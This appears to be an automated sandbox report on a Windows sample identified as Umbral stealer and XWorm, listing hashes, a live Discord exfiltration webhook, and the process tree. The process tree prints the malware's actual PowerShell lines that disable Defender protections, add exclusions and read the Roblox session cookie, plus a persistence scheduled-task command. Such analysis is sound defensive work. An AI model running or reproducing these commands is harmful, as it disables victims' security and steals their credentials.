Analysis
-
max time kernel
158s -
max time network
157s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08-06-2024 07:56
Static task
static1
Behavioral task
behavioral1
Sample
download.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
download.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
download.exe
Resource
win10v2004-20240226-en
General
-
Target
download.exe
-
Size
88KB
-
MD5
94c73dc6cc79de28524a82f04adc7c6b
-
SHA1
8ce1411adede8a1485ad718160ef01c7a22634de
-
SHA256
40596da4af2b1b0387147484d112423d317e2fd41cd19bb1b63d2f8429bacee4
-
SHA512
820b38de02b00668b24e6dc0510f632a7648bd1e647f5a9ee0c7d8bd8b86a49b55db72e1cfa2eff0337dc30d6b1cb45af1f904a9105715618d410ff56841d041
-
SSDEEP
768:+CIFqF93IfXwXbOfq1okh8BBEjpaPWfu/WYat7PTXDvt976xrXu5Me0:+C4qF9pbOAh8B+Bfu+YaZTXTt97KruM
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1248607651387146310/L22eWHFIaqQanWIJXuwKJbdlgO8LfAMUL1ag9JLuvBFDDekhSwD3f38KvJADfkAUnTsK
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000001ac1b-48.dat family_umbral behavioral1/memory/404-50-0x00000242F1B90000-0x00000242F1BD0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000800000001ac18-42.dat family_xworm behavioral1/memory/4268-44-0x0000000000FF0000-0x000000000100A000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3012 powershell.exe 1696 powershell.exe 2756 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 2268 remote.exe 4268 svchost.exe 404 skid.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 20 discord.com 21 discord.com 22 raw.githubusercontent.com 1 raw.githubusercontent.com 2 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\svchost.exe remote.exe File created C:\Windows\System32\svchost.exe remote.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4372 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1012 wmic.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 4664 download.exe 4664 download.exe 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 4708 powershell.exe 4708 powershell.exe 4708 powershell.exe 2756 powershell.exe 4648 powershell.exe 4648 powershell.exe 4648 powershell.exe 2756 powershell.exe 3340 powershell.exe 3340 powershell.exe 3340 powershell.exe 2756 powershell.exe 3012 powershell.exe 3012 powershell.exe 3012 powershell.exe 4060 powershell.exe 4060 powershell.exe 4060 powershell.exe 4268 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4664 download.exe Token: SeIncreaseQuotaPrivilege 4664 download.exe Token: SeSecurityPrivilege 4664 download.exe Token: SeTakeOwnershipPrivilege 4664 download.exe Token: SeLoadDriverPrivilege 4664 download.exe Token: SeSystemProfilePrivilege 4664 download.exe Token: SeSystemtimePrivilege 4664 download.exe Token: SeProfSingleProcessPrivilege 4664 download.exe Token: SeIncBasePriorityPrivilege 4664 download.exe Token: SeCreatePagefilePrivilege 4664 download.exe Token: SeBackupPrivilege 4664 download.exe Token: SeRestorePrivilege 4664 download.exe Token: SeShutdownPrivilege 4664 download.exe Token: SeDebugPrivilege 4664 download.exe Token: SeSystemEnvironmentPrivilege 4664 download.exe Token: SeRemoteShutdownPrivilege 4664 download.exe Token: SeUndockPrivilege 4664 download.exe Token: SeManageVolumePrivilege 4664 download.exe Token: 33 4664 download.exe Token: 34 4664 download.exe Token: 35 4664 download.exe Token: 36 4664 download.exe Token: SeDebugPrivilege 404 skid.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeIncreaseQuotaPrivilege 1696 powershell.exe Token: SeSecurityPrivilege 1696 powershell.exe Token: SeTakeOwnershipPrivilege 1696 powershell.exe Token: SeLoadDriverPrivilege 1696 powershell.exe Token: SeSystemProfilePrivilege 1696 powershell.exe Token: SeSystemtimePrivilege 1696 powershell.exe Token: SeProfSingleProcessPrivilege 1696 powershell.exe Token: SeIncBasePriorityPrivilege 1696 powershell.exe Token: SeCreatePagefilePrivilege 1696 powershell.exe Token: SeBackupPrivilege 1696 powershell.exe Token: SeRestorePrivilege 1696 powershell.exe Token: SeShutdownPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeSystemEnvironmentPrivilege 1696 powershell.exe Token: SeRemoteShutdownPrivilege 1696 powershell.exe Token: SeUndockPrivilege 1696 powershell.exe Token: SeManageVolumePrivilege 1696 powershell.exe Token: 33 1696 powershell.exe Token: 34 1696 powershell.exe Token: 35 1696 powershell.exe Token: 36 1696 powershell.exe Token: SeDebugPrivilege 4268 svchost.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeIncreaseQuotaPrivilege 2756 powershell.exe Token: SeSecurityPrivilege 2756 powershell.exe Token: SeTakeOwnershipPrivilege 2756 powershell.exe Token: SeLoadDriverPrivilege 2756 powershell.exe Token: SeSystemProfilePrivilege 2756 powershell.exe Token: SeSystemtimePrivilege 2756 powershell.exe Token: SeProfSingleProcessPrivilege 2756 powershell.exe Token: SeIncBasePriorityPrivilege 2756 powershell.exe Token: SeCreatePagefilePrivilege 2756 powershell.exe Token: SeBackupPrivilege 2756 powershell.exe Token: SeRestorePrivilege 2756 powershell.exe Token: SeShutdownPrivilege 2756 powershell.exe Token: SeDebugPrivilege 2756 powershell.exe Token: SeSystemEnvironmentPrivilege 2756 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4268 svchost.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4664 wrote to memory of 2104 4664 download.exe 73 PID 4664 wrote to memory of 2104 4664 download.exe 73 PID 2104 wrote to memory of 3968 2104 csc.exe 75 PID 2104 wrote to memory of 3968 2104 csc.exe 75 PID 4664 wrote to memory of 4372 4664 download.exe 78 PID 4664 wrote to memory of 4372 4664 download.exe 78 PID 4664 wrote to memory of 2268 4664 download.exe 79 PID 4664 wrote to memory of 2268 4664 download.exe 79 PID 2268 wrote to memory of 1820 2268 remote.exe 81 PID 2268 wrote to memory of 1820 2268 remote.exe 81 PID 4664 wrote to memory of 404 4664 download.exe 84 PID 4664 wrote to memory of 404 4664 download.exe 84 PID 404 wrote to memory of 1696 404 skid.exe 85 PID 404 wrote to memory of 1696 404 skid.exe 85 PID 404 wrote to memory of 4708 404 skid.exe 87 PID 404 wrote to memory of 4708 404 skid.exe 87 PID 4268 wrote to memory of 2756 4268 svchost.exe 89 PID 4268 wrote to memory of 2756 4268 svchost.exe 89 PID 404 wrote to memory of 4648 404 skid.exe 91 PID 404 wrote to memory of 4648 404 skid.exe 91 PID 404 wrote to memory of 3340 404 skid.exe 93 PID 404 wrote to memory of 3340 404 skid.exe 93 PID 404 wrote to memory of 3304 404 skid.exe 95 PID 404 wrote to memory of 3304 404 skid.exe 95 PID 4268 wrote to memory of 3012 4268 svchost.exe 97 PID 4268 wrote to memory of 3012 4268 svchost.exe 97 PID 404 wrote to memory of 1420 404 skid.exe 99 PID 404 wrote to memory of 1420 404 skid.exe 99 PID 404 wrote to memory of 4460 404 skid.exe 101 PID 404 wrote to memory of 4460 404 skid.exe 101 PID 404 wrote to memory of 4060 404 skid.exe 103 PID 404 wrote to memory of 4060 404 skid.exe 103 PID 404 wrote to memory of 1012 404 skid.exe 105 PID 404 wrote to memory of 1012 404 skid.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\download.exe"C:\Users\Admin\AppData\Local\Temp\download.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3s5dplcu\3s5dplcu.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES62B1.tmp" "c:\Users\Admin\AppData\Local\Temp\3s5dplcu\CSCF6A9F095FFF342D0885E931B993F34D.TMP"3⤵PID:3968
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /SC ONLOGON /TN Updatew /TR C:\Users\Admin\150F4013\temp\run.cmd /RL HIGHEST /F2⤵
- Creates scheduled task(s)
PID:4372
-
-
C:\Users\Admin\150F4013\remote.exe"C:\Users\Admin\150F4013\remote.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /run /TN Update3⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\skid.exe"C:\Users\Admin\AppData\Local\Temp\skid.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\skid.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:3304
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1420
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:4460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1012
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3012
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
258KB
MD55b361316509f8f3194eb12dd8b741c6c
SHA1e98492f076095a6f323e80277ad55bc0639406aa
SHA2562c94d9e87ad5c843048c4a09c3733b1d0326f3b5ce6a40e7b964f45034011dd4
SHA5128b22c6147703bc05f3405db877061d64642a3353661c7893482e9c8c897453e1edde3a39abdcda18ed50c296a520efb1430a2a0a7c1d119de363d72bb360abd0
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD515f20a964e1248ac34131e2793a43589
SHA19a03fc3b406975fda1da1fe252e60b78791a3973
SHA256dfbab49ede8a8b0bf8dd593f7276d79145284f5180bc201dbfc10163d929f326
SHA51296ff851cf7c76e02ea9ce3815c6de0bdcc818a986a175b19379624068ce14ff443db99c9585835e4bf758d87b21eaa974483c68799ebf1073e35df0f6f1b2d4b
-
Filesize
1KB
MD5105c3773c4b40685076861036b05ff3c
SHA1347afc40b613aa081a0ed6c86ccc5e4594566c4a
SHA256a73fa948534f3ac94b61e7b9db7df28cf2e0dede75ebd706bab71cbc0143cc8d
SHA5120fc8346053834f2cfb79beaa0f7cd484301651522c024300d0565b422b49510c3617742b3cd21f3a857561becdf6ac86af417863237f17cc2a5df2d447472100
-
Filesize
1KB
MD52c2b940988d1b52ea721fe23d4219f59
SHA16cecbe6cf36fde2729c81903ff92b8bd46f5c50d
SHA25674056737a14b44ae138b3f13fcc45f86b311bf47f6bbe8486a4185c4b720c450
SHA51231ba2532317473b532711ebb04ec7b6bb067fe8fc99dcd2dc9cc500068c169bfc59e605aa71922aef345c17805cba536434e2e525f2727da85b1fcaff085a3a2
-
Filesize
1KB
MD534555c34946758baa238625f2175fab1
SHA155e507c6d8da1465c056eb8f72c1320a24948a99
SHA256770a5714d600917ab4042b288cdef7b94732526d63dfff55e80697669d78d056
SHA512ac4105fd44f947e3a956c63bbaab024f2fc87fceb904dc2adfb3ffa1407e2a666c4a5eaa9f80592e3d499a1c50e6bfeb33738bf9649fa2fd96cf3d8d3b3c7403
-
Filesize
1KB
MD50b034787450e812a780ecf09118130d0
SHA1bd0825f4e38841a38fc15ffa4f7474beb097cb2d
SHA25605d6bccc5d2308456b188709b48b9d58ab95723f48990b97a0f7e3939767f474
SHA512a4c9806cc7cebed34389a11cf76b9608dcb68de76b2c547e38ceb5a54605e1b33a60c8e8e4e9d9cd04b984913d5accb1b7611042fd6bbc0f9fa960176cf2c703
-
Filesize
3KB
MD5c967fec1dff3f4a75d80ae0dd37352c1
SHA11c4543e0aad03d786e9be4c176e04ede4889552b
SHA2563e7b11bd4342444578191d684ba75b60ff4f84cd9ec970f5e1babd039a1fa176
SHA5128b87b232be53485a13182f3151c0fd3b7adcfd06761cf547b4cb2ada0a563b016953b58071b2c392682ae21d51f157e497d643fec91281f2b2b0339b1d6cd413
-
Filesize
1KB
MD5fdcf8ab1167299fb5d91235053394ebd
SHA19f8b96c8d7f73feacc541d7a17e7ac1fc978f8cc
SHA256505d13b3c714053b4b2dde457636757bcb5da6d96f584eeac40cab420ec81b00
SHA51225345b3bdb9dd66ab8c86e6e0788dabf3c31cb5374f1df3b421bcc9059dc6785d11df14d37200f7ee3e6abd418a2464f63a3a84e79deaa9d87d6346b9404dc53
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
229KB
MD51adeea63d576dea9add98e01e9fe78b4
SHA18f754fd661d9ce2e9e9a7278b4dd7096b13fc585
SHA2565a2904a05d5d2f5d3d3ef44bdf54e74341ae9b54ba5f6545b37acf187eec4f84
SHA5120ba3c5555273a15c5406f0bd1b5f1a3888814bdbb4130f80eae1f973497c4e5d81a92ed0797a55316b358a42a955fe44f476d1e0e90c15211dc30f4dd20c58cb
-
Filesize
75KB
MD54215e3706e043c0af260e1a19ee77b08
SHA1fed96918f57562492f5c6c9a4630ffaaedeb587b
SHA256be9f90f035ff41d59d5579c507eef589daad57aa749128f88df76ca7d858a488
SHA51238e946bf7692fa9ef6fd078853f2b2e21d3034f43b109c9de86c61020533f8cd557df8721e1b5b6e907762c2e83422a6d98999a109b9876cc6590422d3bb0733
-
Filesize
260B
MD5c693814f693e6bcc3e3fc8c329045ebf
SHA12a0cb4b246ec0dd4180d3a16336564078eae7a37
SHA256c8f0ea4dc2b29ed53ac9dbdcf0ce45263a1719a7232b1affdd9825ee0c775651
SHA512593b5db1257228119d52f46da6bd433c14f23e0cd3414395ad442121f88a703f02352e29b7a38f666844c3a89239c23c54f7002b3ab04682ee74ae1792888d9b
-
Filesize
369B
MD5077fad4deb2b28de4c198065ca2b43d0
SHA197dc9efbb8542102d859a17ea772ad2ccefb20cb
SHA256d0cdbcecd03a7f768c2a5f0290e6b458d878f10574a3636de78f07f4c638de34
SHA512fad72ec0e1312034617f20aef567dc8b3be7c9f3c509504af424cecde65cc65c340dfc9defe54682563b27a3849fd694f0b27ead1f866bdfe694e6c425533a9c
-
Filesize
652B
MD5902a32a3316314979e28f1b1e663184e
SHA1ba224b134d6328966a4877babde450004f3acf8a
SHA25604e01d34bf2f3f23f5fbfe60625a15c2e2fb695791b9ad0779bf6247dd4a2d13
SHA512b3270d3412f757932f9fc8468bde8522b7e2024cfadf4fb6de56fae18b875f2f76b98e5d17569f46b3710ab119adda4016ef2e0303f045d98d5fe087cdc9474c